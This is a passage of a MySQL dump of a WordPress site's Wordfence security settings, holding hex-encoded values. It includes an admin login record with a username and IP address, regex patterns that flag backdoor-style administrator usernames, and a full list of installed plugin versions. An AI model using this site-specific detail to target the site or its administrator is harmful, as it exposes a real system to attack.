3C3DB8E87AAF276B2959526B23D479E9FE9569F6B7232CED74335B6ADB8CF6DF4CA7E717E8CF289B1D804060C133B726658E185B8BD936558C874A2C5AA2E1D2B5BA4B5A3FBF28E11E592A9487B76FACCF22E2F737C55C85AD3C80B41A768244455B273D3CBF2AD1B01E6FA49CD7B270031C1E3E2DC118C98E4870472F8AA8E6BA68A44DFE4F2C261B263C9F6B4F6236BF451626D0E28F6B928B7A07B69615EA85C76ECB74AF2D64DA9944381176051413618A05FCD7E826AD363882C31AEEE8C460A2937DCF2E4A9BE21E840A598EB09D36E9B88F7164B5E1224DB0FEB4E80566AA1FDCA71F2EC604A85425A9BDE85884AA28C9558A0307502A60F39A03EA521AE89763192F317A0EC761FAAEAC485AF143EA19BAAD0A8EE2604DB449936585D6010EFC73DF31F187300D3EA31A9791D357AD4E5C934CE4FA8C29A7C70C2174135A250EDDBF3254D758C17D4E42395A867B1011EA15DAE7A6DDCA6B3F8893889D61EF275B8F32866798FDEC332FDC9D0ADCF39BCE06578DC6B7AAA0542FCAB34DBF21C3608F3480C79B71E2F3D9EDD751634BC5F63A607B58509CEBF278E9104AE4D7C34B3F367453B2B5C19B92948D07113CFDD7B9D40C364587B6132D5487FB40B3DB7C4F38547CDC836436DADC53A1DEE7CC4D22125A810E285037038C75567F0BF8CABF3928F02EBA441E74E88D579FA716FCA8523265D8F236D1256B0DB95BA72C8B9F3A6C2D44CE13DA6D6366D9D7A5168A819B45A88EAF6F29CE081C117D1CA43D3F3AC20B50FA8CA54AFCEB18888E56995BDDFA0506F6D5C44357ED421C08584A0F3AEADCBDE6FA6E9615B996365AB551C19F53E54C8F5DDC3B8B77E3385EB243AF3D097861BF9C3F765A8E5E357895F367C9716542DDD3E7BDC721D430ACC3DB1F3DA6BC8C552648C6A80A63613BF03C4F49E5419E3CFC2EB11F8CE271282B3A2F3E2C2CFEF74B0E2AEDD6127EE5825013D04E642962DDD4570857E9E27FF7529F3F992331348CE5F6378F8C54EE3029E04DB706EA6A6787B7F015685AB8240D3F4106621B7B7442E53B0B04A2FDE786BF96E5AB67E0F71C6EA364CEA82A824D4F412AF883F7B494925F5269C908112562841770EAED83CE4A9BB0184CAEA8D63F424D061823DA5B8AE16E804B5213343B9500359ACE2A12E6325C7300B623F4FF4294DED9FB499FBF8CB5BC204253E7864EB5D3F5A8A1FF1B49D9E31F58013BCF4357F8FD9CE71F629958139572F60AFE76B57E8562AE08D5F695F2768CA4D61F4435157DC7E4BDB30B1587E441ECE3CFD11A4CD123ECC35EB4F21095527A3F1F44961D3B4392B7FB67FE58DED36ECA7DA6646C903A337AB722CC1F53FCFCB4FF45093D31AE2729F286761EB9E75053B598852873EE8BA761E5CD9C23F73EB6BF45CB820B87ED06D8694E056FDE27CDD90A5009989217FD4F4D9967F5836B1B6F461AA769B2F2519310855FF4564A0C85F7727B1DEA297B6D74B4773B32A3C76F4752E9880F9EC11EA149753B2CD41600AA40974A7FAFF70279DE25CCB912B26F491A12A7534AAB50563091A7B050D988D88861DF6A4F5406C280C32CF75A5DCF4AE2D56B004FFF092CE0207E21C4ACB8085A27A95D8A7600E172A122396E46AF4AF785AB6C926E71ADE7B08430D42B65DA28D06DE5910E123F03C001805215FF4BC4D7E2889AAA5FAAD6BDCE05F8D4DE8D657BCD446138269895DC80BAB16D3F4C1EBB6E569CB8D0192A142D9DD6C40868D6AEB21EB03004082FECE1D178B03F4C5B201028E33F7B487B2707660F17239489F0B8328B663DF57DE8F4B228524F4C647E090CFAD27B736DC499D22F31256DBC99C3DABC230B9DBFEB5BCB2F11AF4C7F30CD71068D6ADDD863C65314CA22102D3B304F8841AAA8A44A44BBE9769F4CD402A538CC4985267D4C97FBA09729013B8CD7A02DEF7322C6FDBCF51AEB9F4CF95CE4655F61185E96C7480B02AB31367AAA70EEBD05601E298B2C3B9C7CBF4D7D4DBAC83A3426AC64C4E83F902685A01ECED652593442789C7FC477D77EEF4E545CF6B2A1809AACF57D88C6A06BBA17C8195C24B2792A06CD70110C8883CF4EDB28AD3C7D2EA66641555C8C6ACB6E682C9C85CEAAF6648DCCBEBF6F77684F51249AC499ADD77DF64A61D3422B0E98697D1E0DED230145FD511EB68ED5E31F514A0CA2DE563D60C6A04A6487466DDACD33FF3E1CA4429C427B7D66863462CF534AF7C69D3516CB070A7EA1174F73E0BF12505791DA3A8B2E43150A56242FCF55282FDA681F45B427D960F1F0A5B8CDA1EDC3B094932710BE8911E55D43EE5F56E29CD84B8BA497801B4F1B456055624BA04CC5A3DBE9471C5554FFA90E063F583EFE60AD4C7CC34900D1D27529F320716E438CF46283E461CF084322094DDF594C222516A36BF68B317EB2715965668A6AD177EC619C641641892BA8037DCF5A6449A106380C9DD41891AB548AF7A79DDC04993EDEE03EA51E8895D911C6FF5D2253CBBB0444EAB4E03198BF74D9E5EF3AE5EBABE2F6A4339F2746296A670F60D3CEB2121648E659F70F51CC21AC2F6141209A530086D7A93C3C71798E925F61685E855895EBEACAA8B3970DDF426D9EECD0B60F66E4D7BAC206E08BE154CF61A021B4E18FA8AF13A874A30BCB24C10A9F0329DE6FB224CB1EDE2AF9C74C2F6253E9C813A31B88F5799B552BFDAD8128ACDA9B0C20551D46982F17ED55E47F637702F02E82B1AADD67AB082AA13DA163A4DF44B839E70A783D46FA42A41BEF654DA8CCC84CA9F5B77AEBEC1549979369B99313F2270F71D16B94CDDD7C82CF67672926047E1CC83CE53FD80B084A9C22420E1C132157C82A83EE9F50F8959F6774DFC575BFEEB20B4DF0149CBEE2FAF482D6A0D25E84492B0B3C9141F8880F6832BAF5034D5110B672EBDE09EC41F7BCEE1CAFE5E579CC42F211B5B71758FF688CD5420AE2667C996D00D032E85C43AD8291DA751D9DD378BDDA3F0209968F6B322629F592856DDD157CB7C2F355BFD0872F0C9B72ACFCAD04D96DAD46C19F6BABF72E1FE126EA9B67A195784FA6D3A66F84F2679281EEB48DC1BB4E3D4F9F6BB0AAA235F46AF443AB1AED53149D37D55220048D8429F2660C638FB806D10F6C82155A163251C1105725417A09407EAE32EAA8D71837886EBB9049E183D00F6DAD422F849E03863EF5FDD3BA26BE036BDF9521BA4728BE702453F7B64C2C2F6DD475FCD41949BEA3702A9BC9CC363302B9BD95E45CEE96831EEE4847BEBF3F7023955CD2CB78EDE1D256B3113580C9D030D204C6316904EEF893BBD3C4BCEF7067B962AD2FA19196B934CA40EBD9CCDFD96EC452CCD742AAB4AB82E09EC97F707BCBB0F1D2AE6AD815C359CB5639D25AA61FBA4509F54C19B67B30478C8BBF71D3D97DC7C409420D483C4D95CAF9B4856713218AACE7635C26FAB9B2C9900F737FB49D1B4F94587B3A399C639302E424165B5343E0B8F5D79FE5382506B99F73DFC3969CEF06643751D096C36458023F15A742C17233C8B1A4CC7345ABCB4F7460755AAB1BF81217D5CD68AFFF45F10C8951DABCE0B6FC02F0342CC0F5C21F75A3C2602C15E8753DBDCE88E56C4C03FBDC0BA5286C38A0E14A55D80820984F796B5F45599C540FD71F0871BE25AFB981AD2E0E3D7378C8FC2E001EBF14249F7DECDAE36DDD8F4BB52BE8AD4A40E7A86A4388D5C7F3494F9771FE6C4638B0EF7DF798EBC80DD739698F84D99293940F38AA3EEFEC9F08A32EE8BD0C1D82EC1F7EA56FC2F42B0CE63356197BA0D521749A0473E3F15A3A8E7793BCD2B9AFA89F7F427F90807534145A6443ECCD31CC6DE717161E75F01CACBD8884B29F441BAF82C377189F83E6427F995B789BA12407FB2044078C4C2B09445BD5D011F7C06F82FBAF3B1595180B03BA523E636CC7963E4C88CFA1312CA97C9086AFFDFC84CF832A9CB2D5BD12033BBE602FD5D530EB3B39D2EEF07E35CFE059F30D794A3D5F8422F0AC96A01937A270361E713FFF418B8B7A7F8BDF7D913D51346F0904C1AF8487F2D12044C09602470312F3E3A7297FDDE0756A0C7990C3D3D7BF0CD4F72F8520EDC7867D34A390547303E7AD71B6326F6180B49C38662347EA82A4CAA51F8526B67210B1E690110CDEF66A66E622E2AEBCDCEB7DBD8F0A21624CF6777CBF85417CE0BA9233B3FB2DA6016D23FD0C93B228CE841E4F6597C9DFB97583B75F861F416773F6F6194E6EE624E248D06B26749CCF608CFF4F52BC70FB7E1522EF865EE1AFAE8E0C0F470740BF1B5D6E1A388A5C93A1AA4066027381CC1790660F895A5778957F0F630E3DBC850B7AA520386C687B2EE5DB150F664ABDE242A48F89D0B390A3F9A677B1CD1F701A5670B73FB0967164FC801E0589E0349D8236EF8A4A82146042359C8BC76227CE93AE0DDAF4347230A59B9455B8291569F77CEF8B969A225A82D2546FE00EBE5C01C5B986EEE31530190618EB1D32BD2D3E45DF8DB42AA4532D87396C58E29963FD49F8D13CC42B0091EEEA42A15E85A9C4FFFF8DB926E2B8F7AFC60DF9718DDD7085D11A35E8EE99124BC649B67CFD24766BCF8E76DE4B04738B2407E6E7FF3F13FE20978B6C42AD5917808BD6BFBFE53018BF8EB9EB539C0A6B201FA945504D75281DDBC22A54549BC207B86607AE5EB2484F8ECA8807107ED10E6EB5A3668D6B24318BE86523DA6133848A089CE90D4C93CF8EDCD3E021BE61379EAE879E53DF4FB20F4D883950FCF47F2D5D3A917269891F8EE30FDD42A97B7B2FC75E30014758D0D99E62B4D0A4DC6BF1F06D33480F866F9045F9E4D4785E0E6253271B9E5BE3008E82FD2933A3BE585EA65E457A44792F910CA88DD50E4C42CD4F64BB494415D48D4FAEB25E9F3FB1CED10A641F5E651F93CAF1098A3932142AC7C24146BA8AEBCDD88A01F23208C65AC69142530031DF94412E6B4DB9E1256E89AB97852420E427925C468D15776B3CEC7B66DD87D6EF9473E70FBE3D1B9FAE15702FE83E7C3E9359A0477F599C44FCE45CDCCBEB66DF9479F942E20D583BB6782F93FC283D072B0D0A20E6A1E73245F944426D697BBF948ABB2E19DAD057325E2FAC60376FC782D10E2E8EE23F5BFBC813F09E4EA11F954A5B9B435E1AB29DFF85C4E700E9AB1B806C1031DE85B8AE1143EBBE426ACF95D8C9106E28817F73A18FF9CF82EBBD1A5D78784A2CC341BF69A9E558B8EDAF9686E6CB190C368C0C8CAABCD6A46AC2A2A1A8C06B5F357EE6E6672502333CAF977D6A224D8E98FD5EDA1C2A108E6A1983304FEBCAD4407C75CC85BA249A380F9979777448D3D4F246C1ADD049EF0EFE5499DE2393C80E730106F78E9BC3E13F9AD4C31A0CC1A3F96AFEAF766E85D0CC5FBD0743210D08898E8F235FBB2FA03F9B3499876CB17A80B43C028AADFB1777A699B11A543003338A72755881593E9F9B524F65301AAA228D45D34E250B6D31595BFBE6355DC76C5E1A2AD9728AF63F9CD84C9AFFD54CEBDDA90245FFD83E2F5AEA553F815EAF189A9F181D08ADE7CF9D07C85E5D96ED3E34493019D7EBD0896762DB33B2688B9E357EEB29AA5300FF9E13BE4E937CB0B2291164C7EDE85BB4C45BA602119E0296CCCCA9BFD687F4CF9EB4FD82FCCA9338DBD047A348FCE9AFB433A55667A5E155E476EE7F5B4E313F9EC8D2FB77052319143FACCAC321130B03280084ABDCE8D0F3CB1913AB71D5FF9ED4221732AFEB9C36CAAB07FF636C7D5D822515FFDC8B9A932AE0FB69A6137F9EE3C5C557DCF220C41A808B4B273DCC23F97DC433987BBD21FF160C272ABC8F9F0301BC38989CF05C3EEF200E8D831BC02D679A369FA4E01372C4E5DDC38E4F9FBCFAABE8EFC98CCC413CDDC431F912C30319B53CDAD18E72D80619C16BD62F9FCAA7059ED787B5663DEFF6F80F86C4E47A2717F6C6B6287A1F9F10FE1A661FA0FF2C3B1D49F877962D01BD640CB59D3E4D4284A357DD7B8649374604D751EFA18BCCC0FC6821180557A5BE7BA775C3DCABC005B0A4B8D6978B52D623EB4C5FA2C0345FD64BDD294E00A4EDF2D8EEBEE00B4398D04704D302B12B1BD7E309FFA3A3672C2BD63C9CF090385E2687B804D5CF3B6D2CBD04AAC9A2CBA6B0D3FFAFA4F1A2FDE866685BDE03FBD78C88339BAFA0D085150400DEF14CC1ABEE1C1FBFA53D27AF3BDAC0AB3C045B44F8C93B5C777462E50F9EA296E3EB3F93CF1CF18FA5707A8CE1C5329BF0887D05FD75DB5E6EAC31959FF618A276B59B9ADD9FFDDFA5F6F74EB72E3A329CDD643A7010393B9D945AE490BC76D2FBD3BD7EFE0EB67FA67BCC5AD148E8BC6B1D2E03060FCAEA3385EF9F9EC5C82A6C68BFD7E0E96A0FA7E924AB1CC3715246B5373596D65280BB07C01A3822EB890C5B97A5AE0C55BFAA2B8AAEBAABE6CB063E9EC9D8B858F8A71DA6FD79F07A19DB84B1FC8D69B2BFAB0BA25EDD882C32161CE32390ADCE3C8FFBD120C60A8465F066894A02A8A79FABA072EB65AB1DBAD50EE1030B7A82280926A85C5CE0FA73D78610E740E5C4BFAD7680193A3E139A6F519C0E477C78FD0C4EDBC903B5A29F5C2EE4BFE7EDE18FADF51825B063A3ADDFCB46A9E7390DED8065E5A4007326EE2ECB3766529655FFAE40575EE82E9EE2105C539BD5DB47765103CBBB987CE81B9694A6B164E901FFAEA754DFC1CF3D98D8B8B4F19E34930787B4DF0791B9D520DB47EBBAE53B2EEFAEDB54253195485AABD18F0A068C25A73A92A1286F7B28F5B3F09504FB49376FAF3041D44C58C692AEF8E62F7D5DA2AA13BD8A94493DAA8B26EF3082F4EE09CFAF349F8A87D372BC695A441F7DCE0036CE6ACBF42F7F574DB2773F7F0740C06FAFA0482BE736804AB7712EDA5E46B315DFF273AF22665BF7490A462AF74F1EEFAFF2ACE0A27BC5A25B1C0245ED9F2F4112AB942A5FC525F7EF13B410B8A95F2FAFF6B38ABDAE6F35C3D03863E1C4AF5B9BAC431EDC07E288BE6E9410E63EF71FB026F255446FE04154F012DC1477AC24A544E3EDA27BFD9F1FD8294E798232EFB0B44A53DB1F4F8D2D961DE3AF4DF27036A954BF9E4042057485392AADC1019FB18600DC8797E45E47E7C880A5208CB6929666C97E9A59465157DE3296C647FFB2AF4C38049F146AA5E0F8290C8AF97DC92EC89E557F892E9409E7EBDDD98C7FB54CA60C86CA9ECC020DE39BE98E79DAA5017DE6BD64B56D2E264AA15DD2AE3FB5800154D876FEF0395444F3D0368D957B9FB0020E13724F7DDEA97F452B854FB62FD1DB87AFA4870C066C09C3FF740D198DDB2E049A0F9B6BE8A471D0FB15DFB71D34D173B8CD53E6C0A4181EDB50E8E3EE5CE6B9868C7D8DD52BAC6F13808FB794FAC018A741EEF6C641BF455D0FD5EC1AD45A1254F88F06E17DEB9C17E7DFBA9904A5BAA416E3E149AE3A2C8503AB29BE9C3C60F37E0EEAB3469778C9DEEFBADD9718FEF0863E773CF204080222FE4D9C1C5A1027C73507C309B91C3B4FEFBB08A2101A74AC9C85B683765935EEF4A9E8F5411AB75B556B09419DA85F236FBB5BB62064A1DF1B3F5195207EAA9230F8CFFD4B28B5975A26EE96E4F969CFBFBB9BF0F038E23A30DD01E46315FD2A2279E537A1CA73C16C20B4A38AB40DD62FBE463810A7F17697ABD4EA379D78AECF4B47DCB9C2EDCFEECAE1ABB5EA1AD9AFBF12A8FCCB6043DB7B2CAD9051096872EF51819297ECAF112091BCC5F174F50FC0AF8782B8FA955C77FD731EF9B77EBEE807A9C080829AD220E34842BDC425CFC19AC7F92494912FF25B825E822D096589F9C04A2E57E58343B3BDD5D2AC509FC26C6F4B91FF42254D1FE5157765269BAB264FA33926D07FE6061C515F8330DFC3435711D24A826CE923951194F2A127ABD066B42858E80BDB59EFE6A64452CFC54678B4F72507E18F874676E0BA9679AC9ED28B857A67B1376A8EAD1CD5EF4FC5AACE87DC8904336DD9EF7AB2B913F05148B04DBB85A03F850CB1D643F0250FC5CC4D2F9E80C836B4FD7FDC3F87D48A62246EF192B3ACCB54C045A924B4104FC7279FCE43948F824C5C4AAECCCDF35304B353A27F2C48AC624F4DCD4BA9F9AFC78A18BC7C272BC5E2FFBA3CA27F044877EEC9534E864F40BCD0EC260386071FC8F06D7861B64C5AA432A866B5DAC30C9BE0F2280E0FEE2CDB623384BE5AEC4FCA70772D7C092D87C1AE9E3829035AC62E18A5432BCAECB70683DB416B1DF0CFCACAE97A76A068E23CF6A528585CFD509F0AA8FA8DA7C877AC2FE1FFC3033C5FCBEDCB84F5631A8536C1766771756E7A6CE31090FFCD86C3F1DCE01952E0D95FCC6A8903B7090B88F2DE4A4652AEED2D115041F609E8802CA5BEDA7703555FFFCD8CDB3A7D0E1A67B159CA3E16EA5BFC2217A5BDB0F3E17B566B87434898F10FCEEF7735EA67404452B5712EA4CEAD5AF89E8FFA618438EEAF8D2A9CF874803FD07689F5A3B50E1C82EA4E7F3CB732E1EB89D31BA9B7F71FE2BDC8B0D9234CAFD245064B5755531B9C8F4D7389B97F03C044B6EE27307A1B5C0708D4752F762FD3A4CC0C330F1F7AC6A017D1B1EBC7995EC8A9F57C41EBFC75368A101354748FD3BDB5683AD28FC04CA28C61A420012880DCB6CC59799E0C242E473B0230633FD3F2BE6EA875770E2A450BE4DE76B5DBC3C7078195FC12252DD4C6B69A09847FD417002931A5CBDA2E18F3F688DE738B0AAF380518BC80B24966431FAECCB8CFD475050F9281FD4CF9EC1D3EE53CBE13351FD3F28487C2C081EF83B70088AF1FD48401379C684BF9D6B7DCC7B8CAF5BABC7577B8C4C47CD2EE1764FC7AB9E22FD4D1F0D364963C4F7BDFD81F24591AB2C084D2B2CA21EC796B8E516668A9E20FD4D50E6865BB05926E5F0A8CF0D0C8AAF142CB7A1EB594478CEC278E618A9F7FD56DE8C981AADD27EB45644E907D9C95A360BDF6157CAC05FE0F7A274CAA96BFD67EC690AC142B15FC8EA5B95008BDD37A202D934F21C7735D7D8CC71E1EB82FD79B0059FE415DA31B1D0A933AB261C10B35474DDC8B9A3EA3881803DE2CB53FD7F50B679F3596DEDEDAB88FB6DB601E6BD55ED4902B6E6CF4FC046092195F9FD8EEE0B9B71C0AC4FE7A47EC3BE608FB7CFB73793692E4BFEDCEA4B9DB404ECFD9C9DFE1D1C3B8CA23340A286228E0CC15F05D211938164AA082F35BFF01481FD9F8FE02583B4DBE839941855363EF7814E63B0568A4DB05470F757200D30A5FDA4E4E7815A7C9B5C8E541D892D87B142FD0B4422D02C51C375DCB3C1F76EA1FDAF8FA62E9890C7EDF1DA411ADDCA58A66D2C19ACE9500B0D0BEB974AB768DCFDE378C55123929B000BC2810C89C07467FBA4F2A10846AAC1CE4E1DA1F5DF76FDF3269B5722FC14C4B2907D3A800EAEF17F6BD553E0F72D652673F16314F401FE193168E9D8975D6D33C4BA58711EB0C38FF7EC6AC25FDE79AE5B2B78F245E8FE1CC756307AD906EA0CC1781769071F9DC705FE0ACCEDB27FDB469E0ACBE8B7FE3791DB34C6E6AC8B1F5CF3A04D7FE83D84B0E64F82A19D960668B3BFA39992FE3DD8ED6C6E26CED1F8BE84E7C483E64AC7D397B5890BA37EC4C4DEF785E96CFE4C3B952DBACE46D2C400D313D955B11F832A2FB797D613D664E32E3E7A5FDBFE4D45C84DD58F2D2F76C4E75FDA8563929CE2AFE93F2C5526FCDF22968B0852FE5BE098BC52E1B1C6D8E17C4CECF58C1D95A71E3C750551529456B3A4A0B878FE731FA08F09625BD079A669CF43E0E2A8F500F6E2F4E3040C54FE7140577E87FE7B99E1B99C6711F149553918FF0081C5D8DAA15377ED7192055C284C70525EFE9D5F6DCB6F021BB2103C0165C7E77B840F104645B2500A2DC0E1F0DE2C3548FEBC3AA49C40BEE614C60DE0251CB7AD2D8399BD0F1C18BDE02C2479B7C36BE8FEBF135CFD3386EB94A2DF937BBD42329741E10399EAD61247D9133C8A902625FEC1F9DFBC7724029EA699638E54115615C2B60D897C6607F8376843C1701AD0FEDD389A778147FE2B8919645578D1D5586388D1A856F22A15BF36D86928CE07FEE5481BD6587F77D9365BF2FE7CFD4A61D9CDB4E7D0961E151BD2715E07FCA5FEEC4F9E0B683B7841F433D7F72D0DACF017E89D684D9C3E6B101C7637A5C55BFEF29EDED78764A3CC827A523C02AF19BF32F5EAE84B88AED3D8C33789490793FEFD49C60B1C213126996AB6875B369BBC889A353669B938E7139B02156E9E74FEFD6C992AFFC7F1073FB788F2BD2F5DC01AF834EDA8B97458EA2AFDB9F235AEFF0632F32E1870B2C2B7D02284469C02365AD8990AB9DD0F247A8CF77AB8A40DFF1439605C265339E27E7B2D134C4BC59D1049DB54966918D8EF3B957521AEF6FF37F4FFB19855CD65B048113E202DF49D1B10E42547A0B5288C6D1DCE0098F9FF440F4F3B86995EF14BD4E48F6CB5BFBD80D8B821E02F3F614607D37AECF223FF55B32566F605EEAD7BF878F313CA698C3CE712B966AF9C3BAF98B5969A894BFF5A39DEB04EFADD576A5F8948F1AC5DCFCD9A569449F952155BEB839BD61042FF77F09A73B0D0624E7DBC715985C7FD377A6F9555E61EAA75F427A1A5D61E31FF90136BAFAE927E502C6FFC0CA8C1CA820C2D7EA642CABECB693E311DB92F23FFB41EDE23F6DB799A8B1B587FD46F61AA855C4481C59E68136562A40589F518FFC2E0681083E63F299733168EBB31E075F39F1EA17398DE5F73F1B3A2D0A864FFC43E56A02A52889F2F12009888F2DBE3D3B714EF7E72C6258D22D2CAE69EF2FFC5F2386C620CD817CEBAFFA7229E37658E458C3D6E7EDBD1CD992732D5432FFFCBE2FAB68FB80C72CD0DC7CC88D90D8B0E3BD14AAC558CCB91102D1DF35C42FFD63FBB9B0943BF5196BEDB63322047838294E21893BD65E5DE68A3E468EF91FFDADD8C5EDD40F3CBB65C057D2C6ED1DC1CBFDB9B7E41EB46D7022C11EC1018FFE2220FF8C7A2EC40AC0A9F70793426BE37823A98774F9668346AF979A844D8FFFD7BC53C6E97D0BDAF3E21C4ED32FAA45F55D6647E11A0DE701CD8E7B2374F223B7D22F11B9432300200,'no'),('wfsd_engine','','no'),('scanFileProcessing','','yes'),('signatureUpdateTime',0x31373030323433313133,'yes'),('totalIPsBlocked',0x3430343539,'yes'),('total503s',0x3433353531,'yes'),('adminUserList',0x613A333A7B693A353B693A313B693A31353B693A313B693A323B693A313B7D,'yes'),('disclosureStates',0x613A31383A7B733A32303A227761662D6F7074696F6E732D616476616E636564223B623A313B733A32323A227761662D6F7074696F6E732D6272757465666F726365223B623A313B733A33343A2277662D756E69666965642D7363616E6E65722D6F7074696F6E732D67656E6572616C223B623A313B733A33393A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D656D61696C2D73756D6D617279223B623A313B733A32363A2277662D7363616E6E65722D6F7074696F6E732D67656E6572616C223B623A313B733A33303A2277662D7363616E6E65722D6F7074696F6E732D706572666F726D616E6365223B623A313B733A32303A226C6976652D747261666669632D6F7074696F6E73223B623A313B733A33353A2277662D756E69666965642D7761662D6F7074696F6E732D726174656C696D6974696E67223B623A313B733A32383A2277662D756E69666965642D7761662D6F7074696F6E732D6261736963223B623A313B733A33333A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D67656E6572616C223B623A313B733A33353A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D64617368626F617264223B623A313B733A34343A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D766965772D637573746F6D697A6174696F6E223B623A313B733A33333A2277662D756E69666965642D7761662D6F7074696F6E732D6272757465666F726365223B623A313B733A33333A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D6C6963656E7365223B623A303B733A33313A2277662D756E69666965642D676C6F62616C2D6F7074696F6E732D616C657274223B623A313B733A32363A2277662D646961676E6F73746963732D6F746865722D7465737473223B623A313B733A32353A2277662D7363616E6E65722D6F7074696F6E732D637573746F6D223B623A313B733A32333A227761662D6F7074696F6E732D77686974656C6973746564223B623A313B7D,'yes'),('originalScheduledScanStart',0x31373030343134343030,'yes'),('lastScheduledScanStart',0x31373030343135303738,'yes'),('lastAttackDataSendTime',0x313730303538343135312E383434313631,'yes'),('lastBruteForceDataSendTime',0x313639383939323438342E353131353030,'yes'),('lastAdminLogin',0x613A363A7B733A363A22757365724944223B693A31353B733A383A22757365726E616D65223B733A31333A226A6F686E2D61646D696E2D3936223B733A393A2266697273744E616D65223B733A303A22223B733A383A226C6173744E616D65223B733A303A22223B733A343A2274696D65223B733A33303A225475652032317374204E6F76656D62657220402030393A32383A3133414D223B733A323A224950223B733A31333A223138342E39362E3231392E3535223B7D,'yes'),('totalAlertsSent',0x31343735,'yes'),('lastEmailHash',0x313730303538343039333A3239376234373133306566656564626136623133616233333535633263623836,'yes'),('wafAlertLastSendTime',0x31373030313437313130,'yes'),('totalIPsLocked',0x3239,'yes'),('suspiciousAdminUsernames',0x613A323A7B693A303B733A34363A222F5E77705C2E736572766963655C2E636F6E74726F6C6C6572283F3A5C2E5B612D7A412D5A302D395D2B29242F69223B693A313B733A35353A222F5E283F3A776F72647072657373737361646D696E7C776F7264707265737461646D696E7C6A61696D652E626573736572353629242F69223B7D,'yes'),('wordpressVersion',0x362E342E31,'yes'),('wordpressPluginVersions',0x613A34303A7B733A31363A2274696E796D63652D616476616E636564223B733A353A22352E392E32223B733A32353A22616476616E6365642D676F6F676C652D726563617074636861223B733A343A22312E3132223B733A31363A226173796E632D6A617661736372697074223B733A31303A22322E32312E30382E3331223B733A31313A226175746F7074696D697A65223B733A363A22332E312E3130223B733A31373A22626F6C64677269642D656173792D73656F223B733A363A22312E362E3133223B733A32313A226B742D74696E796D63652D636F6C6F722D67726964223B733A363A22312E31352E35223B733A31333A22636F64652D736E697070657473223B733A353A22332E362E32223B733A31363A2264697361626C652D636F6D6D656E7473223B733A353A22322E342E35223B733A31303A22666C75656E74666F726D223B733A353A22352E312E32223B733A31313A22666F6C646572732D70726F223B733A353A22322E392E39223B733A31393A2267612D676F6F676C652D616E616C7974696373223B733A383A223230323331313031223B733A33303A2268746D6C2D656469746F722D73796E7461782D686967686C696768746572223B733A353A22322E342E34223B733A31383A226D65632D666C75656E742D6C61796F757473223B733A353A22312E352E30223B733A31383A226D65632D6C69717569642D6C61796F757473223B733A353A22312E322E30223B733A32323A226D6F6465726E2D6576656E74732D63616C656E646172223B733A353A22372E332E30223B733A32343A226D6F64756C612D626573742D677269642D67616C6C657279223B733A353A22322E372E38223B733A31313A226E696E6A612D666F726D73223B733A353A22332E372E30223B733A32373A227374796C65722D666F722D6E696E6A612D666F726D732D6C697465223B733A353A22332E332E34223B733A31373A22706C7567696E2D6E6F7465732D706C7573223B733A353A22312E322E36223B733A32313A22706F73742D616E642D706167652D6275696C646572223B733A363A22312E32352E31223B733A32393A22706F73742D616E642D706167652D6275696C6465722D7072656D69756D223B733A353A22312E312E32223B733A32303A2270726F746563742D7468652D6368696C6472656E223B733A353A22312E342E30223B733A31313A2272656469732D6361636865223B733A353A22322E342E34223B733A32303A2272656D656D6265722D6D652D636F6E74726F6C73223B733A353A22322E302E31223B733A33383A2272656D6F76652D64617368626F6172642D6163636573732D666F722D6E6F6E2D61646D696E73223B733A353A22312E312E35223B733A33333A22726573706F6E736976652D6163636F7264696F6E2D616E642D636F6C6C61707365223B733A353A22322E342E36223B733A32303A22736372697074732D746F2D666F6F746572706870223B733A353A22302E372E31223B733A31373A2273696D706C652D637573746F6D2D637373223B733A353A22342E302E36223B733A31343A2273696D706C652D686973746F7279223B733A353A22342E372E32223B733A373A2234303470616765223B733A363A2231312E342E34223B733A31353A22626F6C64677269642D6261636B7570223B733A363A22312E31352E37223B733A32333A22626F6C64677269642D6261636B75702D7072656D69756D223B733A353A22312E352E39223B733A31313A2275706472616674706C7573223B733A373A22312E32332E3132223B733A393A22776F726466656E6365223B733A363A22372E31302E37223B733A31313A2277702D6F7074696D697A65223B733A363A22332E322E3231223B733A32363A22696E736572742D686561646572732D616E642D666F6F74657273223B733A353A22322E312E35223B733A31363A2277702D666173746573742D6361636865223B733A353A22312E322E32223B733A31303A2277702D73746167696E67223B733A353A22332E312E32223B733A32343A22676F6F676C652D736974656D61702D67656E657261746F72223B733A363A22342E312E3133223B733A31343A226475706C69636174652D706F7374223B733A333A22342E35223B7D,'yes'),('wordpressThemeVersions',0x613A323A7B733A31343A22626F6C64677269642D6879647261223B733A363A22312E32352E39223B733A31363A227477656E74797477656E7479666F7572223B733A333A22312E30223B7D,'yes'),('lastFalsePositiveSendTime',0x31363633373436303037,'yes'),('loginSec_disableApplicationPasswords',0x31,'yes'),('wordfenceI18n',0x31,'yes'),('lastAttackDataSendId',0x313335303436,'yes'),('hasKeyConflict',0x30,'yes'),('scan_force_ipv4_start',0x30,'yes'),('apiDelayedUntil',0x31363937303036383139,'yes'),('scan_max_resume_attempts',0x32,'yes'),('enableRemoteIpLookup',0x31,'yes'),('onboardingDelayedAt',0x30,'yes'),('lastPermissionsTemplateCheck',0x31373030353833323134,'yes'),('lastDailyCron',0x31373030353833313836,'yes');
/*!40000 ALTER TABLE `wpcl_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfconfig` with 280 row(s)
--

--
-- Table structure for table `wpcl_nf3_actions`
--

DROP TABLE IF EXISTS `wpcl_nf3_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_actions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `type` longtext DEFAULT NULL,
  `active` tinyint(1) DEFAULT 1,
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `label` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=262 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_actions`
--

LOCK TABLES `wpcl_nf3_actions` WRITE;
